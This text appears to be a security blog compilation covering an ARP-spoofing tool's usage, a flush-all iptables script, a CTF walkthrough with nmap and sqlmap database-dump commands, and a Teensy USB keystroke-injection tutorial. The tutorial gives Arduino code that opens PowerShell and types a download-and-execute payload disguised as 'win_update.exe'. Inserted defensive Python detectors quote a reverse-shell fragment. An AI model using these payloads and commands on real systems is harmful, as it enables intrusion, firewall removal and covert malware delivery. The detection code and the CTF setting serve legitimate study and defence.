usage: ArpyKitty.py [-h] --interface INTERFACE --gatewayIP GATEWAYIP --targetIP TARGETIP
ArpyKitty.py: error: argument --interface is required

attack-mode

Ex: sudo python ArpyKitty.py --interface eth0 --gatewayIP 192.168.1.1 --targetIP 192.168.1.103
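
What the attack looks like from the wire, as an added example that is not part of ArpyKitty: a poisoner sends replies that claim the gateway's IP towards the target and the target's IP towards the gateway, so one MAC ends up answering for two addresses, and each address is seen with two MACs. The Python below takes a sequence of (time, sender IP, sender MAC) observations (constructed here; in practice fed from a sniffer or from polling the ARP table) and reports both signatures.

```python
from collections import defaultdict

# Constructed ARP reply observations (time, sender IP, sender MAC); not a real capture.
# A poisoner answers for the gateway towards the target and for the target towards
# the gateway, so one MAC ends up claiming both addresses.
CONSTRUCTED_ARP_REPLIES = [
    (0, "192.168.1.1",   "aa:aa:aa:aa:aa:01"),   # real gateway
    (1, "192.168.1.103", "bb:bb:bb:bb:bb:03"),   # real target
    (5, "192.168.1.1",   "cc:cc:cc:cc:cc:99"),   # one MAC now claims the gateway...
    (5, "192.168.1.103", "cc:cc:cc:cc:cc:99"),   # ...and the target
    (6, "192.168.1.1",   "cc:cc:cc:cc:cc:99"),   # repeated every second to keep the caches poisoned
    (6, "192.168.1.103", "cc:cc:cc:cc:cc:99"),
]


def detect_ip_mac_conflicts(replies, trusted=None):
    """Alert the first time an IP is claimed by a MAC other than the one already seen.

    `trusted` is an optional {ip: mac} table (e.g. your gateway); any reply that
    disagrees with it is reported even if it is the first reply for that IP.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    claims = defaultdict(set)
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        if mac in claims[ip]:
            continue  # already-known pair, nothing new
        if ip in trusted and trusted[ip] != mac:
            alerts.append({"time": t, "ip": ip, "mac": mac,
                           "reason": "differs from trusted MAC %s" % trusted[ip]})
        elif claims[ip]:
            alerts.append({"time": t, "ip": ip, "mac": mac,
                           "reason": "IP previously claimed by %s" % ", ".join(sorted(claims[ip]))})
        claims[ip].add(mac)
    return alerts


def macs_claiming_multiple_ips(replies):
    """The two-sided poisoning signature: one MAC answering for several IPs."""
    ips_by_mac = defaultdict(set)
    for _t, ip, mac in replies:
        ips_by_mac[mac.lower()].add(ip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    gateway_table = {"192.168.1.1": "aa:aa:aa:aa:aa:01"}  # constructed trusted mapping
    for alert in detect_ip_mac_conflicts(CONSTRUCTED_ARP_REPLIES, trusted=gateway_table):
        print(alert)
    print(macs_claiming_multiple_ips(CONSTRUCTED_ARP_REPLIES))
```

A static ARP entry for the gateway on critical hosts, or Dynamic ARP Inspection on the switch, stops the poisoning itself; this detector is for the case where you can only observe. Legitimate MAC changes (a replaced router, a VRRP failover) also trip the first check, which is why the trusted table and a change-management cross-check belong in any real deployment.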

Hate iptables? Don't worry, here is a solution to allow anything 🙂

#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Download ArpyKitty

happy hacking!

Hack Me If You Can CTF 2016-SLIIT

Hack Me If You Can CTF is an event organized by SLIIT Cyber Security students. We, team Agathon, won the Gold award this year and last year. This CTF was jeopardy style and contained 5 CTF boxes

  1. Boot2root
  2. Hack Edu
  3. Prankster
  4. root2Linux
  5. Catch the Droid

Within 8 hours teams must break these 5 boxes.

Here is b2r:

Level 1: exploit vulnerable

Level 2: Basic decoding

Level 3: Analytical skills

Level 4: Basic crypto

Level 5: Stego (but you can bypass this one)

Boot2Root

#Commands
nmap -sP 192.168.1.0/24
nmap -vv 192.168.1.107
sqlmap -u "http://192.168.1.107/page.php?id=2" --dbs
sqlmap -u "http://192.168.1.107/page.php?id=2" --tables -D ctf
sqlmap -u "http://192.168.1.107/page.php?id=2" -T users -D ctf --columns
sqlmap -u "http://192.168.1.107/page.php?id=2" -T users -D ctf --dump
java -jar DirBuster-0.12.jar
ssh user1@192.168.1.107
ssh user2@192.168.1.107
ssh user3@192.168.1.107
ssh user4@192.168.1.107

I'll write about root2Linux and Prankster later.

Plug And Hack With Teensy

Hey there,

This is my first post about Teensy attacks. Teensy exploitation is an old method but still useful, so I decided to write about Teensy attacks. These types of attacks are possible with a little bit of social engineering; it takes only 10 seconds to pwn a PC.

What is Teensy?

Teensy 2.0

Basically it's a programmable HID

A human interface device or HID is a type of computer device that interacts directly with, and most often takes input from, humans and may deliver output to humans.

Interesting things About Teensy

  1. As I mentioned above, Teensy is an HID, so when we plug it in the computer takes it as a keyboard; antivirus products can't detect it, and we can program it
  2. Works even if autorun is turned off.
  3. We can send keys to the active window
  4. We can perform download-and-execute, add an RDP user, add a domain user, drop trojans etc. just by plugging the Teensy into the target 😀

Prerequisites Knowledge

  1. Basic Arduino
  2. Basic C Programming

Getting Started

  1. You need to buy a Teensy USB from PJRC; there are different Teensy versions available now. Currently I'm using Teensy 2.0
  2. If you're planning to carry big payloads you must buy a Teensy SD adaptor; otherwise you can use the built-in memory, but it can't carry heavy payloads
  3. Download Arduino 1.6.9 IDE
  4. Download Teensyduino(Teensy Loader)
  5. Download PHUKD library
  6. Download Example scripts

Make sure to download Arduino 1.6.9 and extract the PHUKD library files into the Arduino libraries folder. After that open the Arduino IDE, go to Tools, set Board to Teensy 2.0 and USB Type to Disk(internal)+Keyboard

Teensy Hacking

Let’s Hack it

Open the Arduino IDE and paste the code below, then click Verify and Upload to test our first script. Once it is uploaded, eject the Teensy and plug it in again. Then you will see the Teensy automatically open Notepad and print the Keyboard.print() message in Notepad.

#include <phukdlib.h>
void setup() {
  delay(3000);
  CommandAtRunBarMSWIN("notepad.exe");
  delay(2000);
  Keyboard.print("https://h3llwings.wordpress.com @angelowin32 ;)");
  
}
void loop(){}

Now let's do something useful. On Windows we can use PowerShell to do our dirty work: we can use PowerShell to download and execute our malware on the target PC

// Download PuTTY and execute
// https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
// Angelo Ruwantha
#include <phukdlib.h>
void setup() {
  delay(3000); // sleep 3 sec
  CommandAtRunBarMSWIN("powershell.exe"); // send keys Win+R, then type powershell.exe
  delay(2000); // sleep 2 sec
  Keyboard.print("$down = New-Object System.Net.WebClient; $url = 'https://the.earth.li/~sgtatham/putty/latest/x86/puttygen.exe'; $file = 'win_update.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"); // download file and execute
  delay(2000);
  Keyboard.set_key1(KEY_ENTER); // press Enter
  Keyboard.send_now();
  Keyboard.set_key1(0); // release the key
  Keyboard.send_now();
}
void loop(){}
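
Both payloads on this blog, the Run Command reverse shell in the ESET post and the download-and-execute line the Teensy types above, leave the same traces in PowerShell logging (process-creation command lines and script-block text). The script below is an added example, not from this post: it scores such text against those traits (-nop and -exec bypass, encoded commands, WebClient downloads, a raw TCPClient, iex, ShellExecute) and flags events above a threshold. The events are constructed, the weights and threshold are assumptions, and the SYSTEM annotation reflects the context the agent's Run Command task executes in.

```python
import re

# (name, pattern, weight): traits of the two payloads on this page that rarely
# appear together in administrative PowerShell. Weights are assumptions to tune.
INDICATORS = [
    ("no_profile",     re.compile(r"(?i)(^|\s)-nop(rofile)?\b"), 1),
    ("exec_bypass",    re.compile(r"(?i)-(exec|ep|executionpolicy)\s+bypass\b"), 2),
    ("encoded_cmd",    re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), 3),
    ("web_download",   re.compile(r"(?i)Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest"), 2),
    ("raw_tcp_client", re.compile(r"(?i)Net\.Sockets\.TCPClient"), 3),
    ("dynamic_eval",   re.compile(r"(?i)\biex\b|Invoke-Expression"), 2),
    ("shell_execute",  re.compile(r"(?i)shellexecute|Start-Process"), 1),
]


def score_powershell(text):
    """Return (score, [indicator names]) for one command line or script block."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _n, w in hits), [n for n, _w in hits]


def triage(events, threshold=3):
    """Keep events at or above the threshold; SYSTEM-context hits are annotated
    because that is the context the endpoint agent's Run Command task executes in."""
    flagged = []
    for ev in events:
        score, hits = score_powershell(ev["text"])
        if score < threshold:
            continue
        note = "runs as SYSTEM" if ev.get("user", "").upper().endswith("SYSTEM") else ""
        flagged.append({"id": ev["id"], "score": score, "hits": hits, "note": note})
    return flagged


# Constructed events; the shape loosely follows process-creation / script-block logs,
# these are not real log records.
CONSTRUCTED_EVENTS = [
    {"id": "rev-shell", "user": "NT AUTHORITY\\SYSTEM",
     "text": "powershell -nop -exec bypass -c $client = New-Object System.Net.Sockets.TCPClient('LISTENER-IP',443);"
             "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String);$client.Close()"},
    {"id": "teensy-dl", "user": "CORP\\alice",
     "text": "$down = New-Object System.Net.WebClient; $file = 'win_update.exe'; $down.DownloadFile($url,$file); "
             "$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"},
    {"id": "backup", "user": "CORP\\svc_backup",
     "text": "powershell.exe -NoLogo -File C:\\scripts\\backup.ps1"},
    {"id": "interactive", "user": "CORP\\bob",
     "text": "Get-Service | Where-Object Status -eq Running"},
]


if __name__ == "__main__":
    for finding in triage(CONSTRUCTED_EVENTS):
        print(finding)
```

Script-block logging is what makes the Teensy case visible at all: the payload is typed into an interactive prompt, so there is no suspicious process command line, only the block the engine executes. Legitimate installer or update scripts will occasionally cross the threshold (a WebClient download followed by Start-Process scores 3), so pair the score with the parent process and the user context rather than alerting on it alone.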

phukdlib library functions


//phukdlib functions

CommandAtRunBarMSWIN(char *SomeCommand); //Opens the run bar and executes the command.

CommandAtRunBarGnome(char *SomeCommand);
CommandAtRunBarOSX(char *SomeCommand);//OSX Opens spotlight and executes the command
CommandAtNewTerminal(char *SomeCommand);
ShrinkCurWinOSX();
ShrinkCurWin();//Shrinks the active window to help hide it.
ShrinkCurWinMSWIN();
ShrinkCurWinGnome();
PressAndRelease(int KeyCode,int KeyCount);
ShowDiag();
int ledkeys(); //ledkeys returns the setting of the "lock keys"
boolean IsNumbOn(void);
boolean IsCapsOn(void);
boolean IsScrlOn(void);

How to prevent these types of attacks?

  1. Don’t plug unknown USB devices
  2. Close your USB ports
  3. Lock your server rooms 😀

Currently I'm writing my own framework for Teensy to perform advanced attacks.

By the way, there are some popular Teensy attack frameworks available; you guys should play with these frameworks, they're really amazing 🙂

The Social Engineering Framework

Peensy

kautilya

References

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload—Windows-10-:-Download-and-execute-file-with-Powershell

https://en.wikipedia.org/wiki/Human_interface_device